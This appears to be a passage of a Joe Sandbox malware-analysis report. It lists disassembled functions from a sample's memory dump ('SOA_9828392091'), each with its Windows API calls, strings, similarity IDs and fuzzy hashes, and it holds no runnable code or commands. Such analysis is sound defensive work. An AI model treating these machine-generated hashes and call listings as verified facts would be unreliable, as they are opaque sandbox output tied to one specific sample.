                                      • _memset.LIBCMT ref: 00955047
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __gmtime64_s.LIBCMT ref: 009550E0
                                      • __gmtime64_s.LIBCMT ref: 00955116
                                      • __gmtime64_s.LIBCMT ref: 00955133
                                      • __allrem.LIBCMT ref: 00955189
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009551A5
                                      • __allrem.LIBCMT ref: 009551BC
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009551DA
                                      • __allrem.LIBCMT ref: 009551F1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095520F
                                      • __invoke_watson.LIBCMT ref: 00955280
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                      • Instruction ID: 51567eca8364fca1e66612eba56570508b55d669ea1eed63c420d9ec83927b78
                                      • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                      • Instruction Fuzzy Hash: 3171F672A00F16ABD714DF7ACC61B5AB3A8AF40765F164229FC14D76C2E770D9448BD0
                                      APIs
                                      • _memset.LIBCMT ref: 00974DF8
                                      • GetMenuItemInfoW.USER32(009F1708,000000FF,00000000,00000030), ref: 00974E59
                                      • SetMenuItemInfoW.USER32(009F1708,00000004,00000000,00000030), ref: 00974E8F
                                      • Sleep.KERNEL32(000001F4), ref: 00974EA1
                                      • GetMenuItemCount.USER32(?), ref: 00974EE5
                                      • GetMenuItemID.USER32(?,00000000), ref: 00974F01
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00974F2B
                                      • GetMenuItemID.USER32(?,?), ref: 00974F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00974FB6
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974FCA
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00974FEB
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 8bba573f4547ad6989181587a68c774b83457a4f2845bebec430f37b7ead40fe
                                      • Instruction ID: e11acab268cc8a6bb3c3c727ccd9a2bc8f99d06c5fac69015c8d7210bdde3e02
                                      • Opcode Fuzzy Hash: 8bba573f4547ad6989181587a68c774b83457a4f2845bebec430f37b7ead40fe
                                      • Instruction Fuzzy Hash: BD61C072904249EFDB20CFA4DD88ABE7BBCFB45314F148559F809A3252E771AD04DB21
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009694FE
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00969549
                                      • VariantInit.OLEAUT32(?), ref: 0096955B
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0096957B
                                      • VariantCopy.OLEAUT32(?,?), ref: 009695BE
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 009695D2
                                      • VariantClear.OLEAUT32(?), ref: 009695E7
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 009695F4
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009695FD
                                      • VariantClear.OLEAUT32(?), ref: 0096960F
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0096961A
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: d617716c05f34aea159d56510f5a3c6a679d2cfa1e6400d4acdd6b1190976084
                                      • Instruction ID: 04789eb50b501d7d8b47d64a98410ac3c73e6e11dc2301e78c5d03ac4c05a6f3
                                      • Opcode Fuzzy Hash: d617716c05f34aea159d56510f5a3c6a679d2cfa1e6400d4acdd6b1190976084
                                      • Instruction Fuzzy Hash: 64415D71915219AFCB01EFA4D8849DEBF7DFF48354F008469F902A3261EB31AA45DBA1
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CoInitialize.OLE32 ref: 0098ADF6
                                      • CoUninitialize.COMBASE ref: 0098AE01
                                      • CoCreateInstance.COMBASE(?,00000000,00000017,009BD8FC,?), ref: 0098AE61
                                      • IIDFromString.COMBASE(?,?), ref: 0098AED4
                                      • VariantInit.OLEAUT32(?), ref: 0098AF6E
                                      • VariantClear.OLEAUT32(?), ref: 0098AFCF
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 370cbb791a2d3dedd7a97a2a736fdeb78b50476d104b1334146fbce199021834
                                      • Instruction ID: 244b632d41c51e26e26d87b71b9cf1d9caf41d44a96b48100900baa3dcf852ba
                                      • Opcode Fuzzy Hash: 370cbb791a2d3dedd7a97a2a736fdeb78b50476d104b1334146fbce199021834
                                      • Instruction Fuzzy Hash: 38619E712083019FE711EF54C888B6ABBE8AF89714F10491EF9859B392D774ED44CB93
                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 00988168
                                      • inet_addr.WS2_32(?), ref: 009881AD
                                      • gethostbyname.WS2_32(?), ref: 009881B9
                                      • IcmpCreateFile.IPHLPAPI ref: 009881C7
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00988237
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0098824D
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009882C2
                                      • WSACleanup.WS2_32 ref: 009882C8
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 09c48c1ada2945d37ab30648e001420b30a4230645520be6dd8945439d5688d6
                                      • Instruction ID: d110df062aed83e9624afdef666a27bfb5a74fb52a4599f5deb2f8c13f04449f
                                      • Opcode Fuzzy Hash: 09c48c1ada2945d37ab30648e001420b30a4230645520be6dd8945439d5688d6
                                      • Instruction Fuzzy Hash: 1451A031604600AFD710AF24CD89B2BB7E8AF88360F048969F965DB3A0DF34E901DB51
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0097E396
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0097E40C
                                      • GetLastError.KERNEL32 ref: 0097E416
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0097E483
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: e4cb7553897e55ef28c8f4de06506b333f6c75c20347c1462575ff8690d2c490
                                      • Instruction ID: 022ddc72b43f17c912787474c44cc40434aacc525f5321a9bc9b6e1839d922ea
                                      • Opcode Fuzzy Hash: e4cb7553897e55ef28c8f4de06506b333f6c75c20347c1462575ff8690d2c490
                                      • Instruction Fuzzy Hash: 41317436A002099FDB01DF64C949BBDB7B8EF89714F14C495E509EB2A1D774DE01CB51
                                      APIs
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0096B98C
                                      • GetDlgCtrlID.USER32 ref: 0096B997
                                      • GetParent.USER32 ref: 0096B9B3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0096B9B6
                                      • GetDlgCtrlID.USER32(?), ref: 0096B9BF
                                      • GetParent.USER32(?), ref: 0096B9DB
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0096B9DE
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 65dfbb973f9bad1fd040b79cc3eb7b760a426975ef0ad7db183a07a2ec57c69c
                                      • Instruction ID: 363037e10dbd07457f234f8ca23982d7ee3952b6f0389925f7f54626def8cf28
                                      • Opcode Fuzzy Hash: 65dfbb973f9bad1fd040b79cc3eb7b760a426975ef0ad7db183a07a2ec57c69c
                                      • Instruction Fuzzy Hash: EA21C8B4A00104BFDB05ABA4CC95EFEB779EF85314F100115F551A32D1EB745855DF20
APIs
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0096BA73
• GetDlgCtrlID.USER32 ref: 0096BA7E
• GetParent.USER32 ref: 0096BA9A
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0096BA9D
• GetDlgCtrlID.USER32(?), ref: 0096BAA6
• GetParent.USER32(?), ref: 0096BAC2
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0096BAC5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: a7acfc412aeef7134fe1c12a6b04543bba45411456ab526ccf4c7b008ba16629
• Instruction ID: 7ad7dff7f5aa1b8125def1ef8e132b276898c3e4c35a975f57bed63233f159fc
• Opcode Fuzzy Hash: a7acfc412aeef7134fe1c12a6b04543bba45411456ab526ccf4c7b008ba16629
• Instruction Fuzzy Hash: D021C2B4A00108BFDB01ABA4CC85FFEBBB9EF85300F100119F951A3191EB795959EF20
APIs
• GetParent.USER32 ref: 0096BAE3
• GetClassNameW.USER32(00000000,?,00000100), ref: 0096BAF8
• _wcscmp.LIBCMT ref: 0096BB0A
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0096BB85
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: b4b48ade2e932b970ed5a63009e9d01f89a85a1542bd7302717fa531148fc443
• Instruction ID: d9779a4234b559f0b36bcc23e6080c1bd02935c56759a70cf36cb18440223a2f
• Opcode Fuzzy Hash: b4b48ade2e932b970ed5a63009e9d01f89a85a1542bd7302717fa531148fc443
• Instruction Fuzzy Hash: 9A11297664C343F9FA25A732EC07EA6379D9B91324B200036FD04E40D5FFA5AC915614
APIs
• VariantInit.OLEAUT32(?), ref: 0098B2D5
• CoInitialize.OLE32(00000000), ref: 0098B302
• CoUninitialize.COMBASE ref: 0098B30C
• GetRunningObjectTable.OLE32(00000000,?), ref: 0098B40C
• SetErrorMode.KERNEL32(00000001,00000029), ref: 0098B539
• CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0098B56D
• CoGetObject.OLE32(?,00000000,009BD91C,?), ref: 0098B590
• SetErrorMode.KERNEL32(00000000), ref: 0098B5A3
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0098B623
• VariantClear.OLEAUT32(009BD91C), ref: 0098B633
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: ebbdaaf626a723918d3ea9d46123f70c455760565d30ce66cce66f879bc70cc3
• Instruction ID: e43ea6279f420c02d1ac93c6e260c6b3cfb747a93f00cba1d768387cab8230c4
• Opcode Fuzzy Hash: ebbdaaf626a723918d3ea9d46123f70c455760565d30ce66cce66f879bc70cc3
• Instruction Fuzzy Hash: 70C1F1B1608305AFC700EF68C885A6BB7E9BF89318F04495DF58A9B361DB71ED05CB52
APIs
• __lock.LIBCMT ref: 0095ACC1
  • Part of subcall function 00957CF4: __mtinitlocknum.LIBCMT ref: 00957D06
  • Part of subcall function 00957CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00957D1F
• __calloc_crt.LIBCMT ref: 0095ACD2
  • Part of subcall function 00956986: __calloc_impl.LIBCMT ref: 00956995
  • Part of subcall function 00956986: Sleep.KERNEL32(00000000,000003BC,0094F507,?,0000000E), ref: 009569AC
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0095ACED
• GetStartupInfoW.KERNEL32(?,009E6E28,00000064,00955E91,009E6C70,00000014), ref: 0095AD46
• __calloc_crt.LIBCMT ref: 0095AD91
• GetFileType.KERNEL32(00000001), ref: 0095ADD8
• InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0095AE11
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
• String ID:
• API String ID: 1426640281-0
• Opcode ID: 05a6aa0c41f457b731c62194f11028e5c13c359680c42719f72ed27bbd37f606
• Instruction ID: 845738a917e055e0d3b5ac4b32c7090d36ab46d4156bef1138bdeacd288e7f1d
• Opcode Fuzzy Hash: 05a6aa0c41f457b731c62194f11028e5c13c359680c42719f72ed27bbd37f606
• Instruction Fuzzy Hash: 558146709053458FCB14CF69C8416ADBBF4AF49336B24435DD8A6AB3D1D334980BCB5A
APIs
• __swprintf.LIBCMT ref: 009767FD
• __swprintf.LIBCMT ref: 0097680A
  • Part of subcall function 0095172B: __woutput_l.LIBCMT ref: 00951784
• FindResourceW.KERNEL32(?,?,0000000E), ref: 00976834
• LoadResource.KERNEL32(?,00000000), ref: 00976840
• LockResource.KERNEL32(00000000), ref: 0097684D
• FindResourceW.KERNEL32(?,?,00000003), ref: 0097686D
• LoadResource.KERNEL32(?,00000000), ref: 0097687F
• SizeofResource.KERNEL32(?,00000000), ref: 0097688E
• LockResource.KERNEL32(?), ref: 0097689A
• CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009768F9
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
• String ID:
• API String ID: 1433390588-0
• Opcode ID: 93e710fff215bb38522a1e42af67e7b3d63d0258d0c39dbfa67c59494e3f4b02
• Instruction ID: 83463da66028ecd1fa1e085e45db56c9df9685a990678beefb25aa18b6402eb0
• Opcode Fuzzy Hash: 93e710fff215bb38522a1e42af67e7b3d63d0258d0c39dbfa67c59494e3f4b02
• Instruction Fuzzy Hash: CF31CD72A0525AABCB109FA1DD48AFA7BACFF08340B008525F916E2140E734D911EBA1
APIs
• EnumChildWindows.USER32(?,0096CF50), ref: 0096CE90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: b754814ddcd059f17fbbc2aec8eae4053b99930e9ae1b6a30e6d2f03702b3a9c
• Instruction ID: f629720c3f9e28c6ca5926f4bf57da6c47c1b42e66ab76e0fba492e24664eb07
• Opcode Fuzzy Hash: b754814ddcd059f17fbbc2aec8eae4053b99930e9ae1b6a30e6d2f03702b3a9c
• Instruction Fuzzy Hash: 6A9192B0A00646ABCB19DF60C481BFAFBB9BF44340F548519E899A7191DF31AD59CBE0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009330DC
• CoUninitialize.COMBASE ref: 00933181
• UnregisterHotKey.USER32(?), ref: 009332A9
• DestroyWindow.USER32(?), ref: 009A5079
• FreeLibrary.KERNEL32(?), ref: 009A50F8
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 009A5125
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: d33bed64d321612be80dd4d25b5352e916d890346f7c1da33a74e7d50433504c
• Instruction ID: 72017c89153b6abb15759da476ac6db068165b1e656a6d1be74aad5397b5a5ce
• Opcode Fuzzy Hash: d33bed64d321612be80dd4d25b5352e916d890346f7c1da33a74e7d50433504c
• Instruction Fuzzy Hash: A49147747452028FC709EF24C999F69F3B8FF45304F5582A9E40AA7262DB30AE66CF50
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 0094CC15
  • Part of subcall function 0094CCCD: GetClientRect.USER32(?,?), ref: 0094CCF6
  • Part of subcall function 0094CCCD: GetWindowRect.USER32(?,?), ref: 0094CD37
  • Part of subcall function 0094CCCD: ScreenToClient.USER32(?,?), ref: 0094CD5F
• GetDC.USER32 ref: 009AD137
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009AD14A
• SelectObject.GDI32(00000000,00000000), ref: 009AD158
• SelectObject.GDI32(00000000,00000000), ref: 009AD16D
• ReleaseDC.USER32(?,00000000), ref: 009AD175
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009AD200
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 058772f66f6454603973c4a492badf2286e9a19a0557e4e194bad7b2131233c1
• Instruction ID: e3b6a78b681c5af9b57ba8d7c5b8513da082f68a4b32194c48cfc91aec145722
• Opcode Fuzzy Hash: 058772f66f6454603973c4a492badf2286e9a19a0557e4e194bad7b2131233c1
• Instruction Fuzzy Hash: 88711070406204DFCF25CF64C881EBA3BB9FF4A324F144669ED569A6A6D7318C41DFA0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009845FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0098462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0098466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00984682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0098468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009846BF
• InternetCloseHandle.WININET(00000000), ref: 00984706
  • Part of subcall function 00985052: GetLastError.KERNEL32(?,?,009843CC,00000000,00000000,00000001), ref: 00985067
Strings
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: 372a092241e091f9f4f5963e5f06e1b1f35d772159300ac16d211fda6bfeeff8
• Instruction ID: 587ea54a858a6136f44916696fc220ffc5beaaea5ecabc98438d944d62f452ca
• Opcode Fuzzy Hash: 372a092241e091f9f4f5963e5f06e1b1f35d772159300ac16d211fda6bfeeff8
• Instruction Fuzzy Hash: 334160B1501206BFEB16AF50CC89FFB77ACFF09354F104126FA059A241EBB49D449BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,009CDC00), ref: 0098B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,009CDC00), ref: 0098B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0098B8C1
• SysFreeString.OLEAUT32(?), ref: 0098B8EB
Memory Dump Source
• Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: 6f28da8992007a8f43281e98fabc8f6502b18b0843999e4b4b345bdb2acd7f1f
• Instruction ID: 0cc665339ef9989cca01b6d003bb104b62f5874e9c423ee3648510f7cb059de0
• Opcode Fuzzy Hash: 6f28da8992007a8f43281e98fabc8f6502b18b0843999e4b4b345bdb2acd7f1f
• Instruction Fuzzy Hash: 97F14C75A00209EFCF04EF94C888EAEB7B9FF89315F148459F915AB250DB31AE45CB90
                                      APIs
                                      • _memset.LIBCMT ref: 009924F5
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00992688
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009926AC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009926EC
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0099270E
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0099286F
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009928A1
                                      • CloseHandle.KERNEL32(?), ref: 009928D0
                                      • CloseHandle.KERNEL32(?), ref: 00992947
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      APIs
                                        • Part of subcall function 0094B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0094B759,?,00000000,?,?,?,?,0094B72B,00000000,?), ref: 0094BA58
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0094B72B), ref: 0094B7F6
                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0094B72B,00000000,?,?,0094B2EF,?,?), ref: 0094B88D
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 009AD8A6
                                      • DeleteObject.GDI32(00000000), ref: 009AD91C
                                      Similarity
                                      • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 2402799130-0
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0099B3F4
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009ADB1B
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009ADB3C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009ADB51
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009ADB6E
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009ADB95
                                      • DestroyCursor.USER32(00000000), ref: 009ADBA0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009ADBBD
                                      • DestroyCursor.USER32(00000000), ref: 009ADBC8
                                      Similarity
                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 3992029641-0
                                      APIs
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00975FA6,?), ref: 00976ED8
                                        • Part of subcall function 00976EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00975FA6,?), ref: 00976EF1
                                        • Part of subcall function 009772CB: GetFileAttributesW.KERNEL32(?,00976019), ref: 009772CC
                                      • lstrcmpiW.KERNEL32(?,?), ref: 009775CA
                                      • _wcscmp.LIBCMT ref: 009775E2
                                      • MoveFileW.KERNEL32(?,?), ref: 009775FB
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      APIs
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 0094EAEB
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 0094EB32
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 009ADC86
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 009ADCF2
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B26C
                                      • RtlAllocateHeap.NTDLL(00000000,?,0096AEF1), ref: 0096B273
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0096AEF1,00000B00,?,?), ref: 0096B288
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B290
                                      • DuplicateHandle.KERNEL32(00000000,?,0096AEF1,00000B00,?,?), ref: 0096B293
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0096AEF1,00000B00,?,?), ref: 0096B2A3
                                      • GetCurrentProcess.KERNEL32(0096AEF1,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B2AB
                                      • DuplicateHandle.KERNEL32(00000000,?,0096AEF1,00000B00,?,?), ref: 0096B2AE
                                      • CreateThread.KERNEL32(00000000,00000000,0096B2D4,00000000,00000000,00000000), ref: 0096B2C8
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                      • String ID:
                                      • API String ID: 1422014791-0
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00999B19
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00999B2D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00999B47
                                      • _wcscat.LIBCMT ref: 00999BA2
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00999BB9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00999BE7
                                      Strings
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
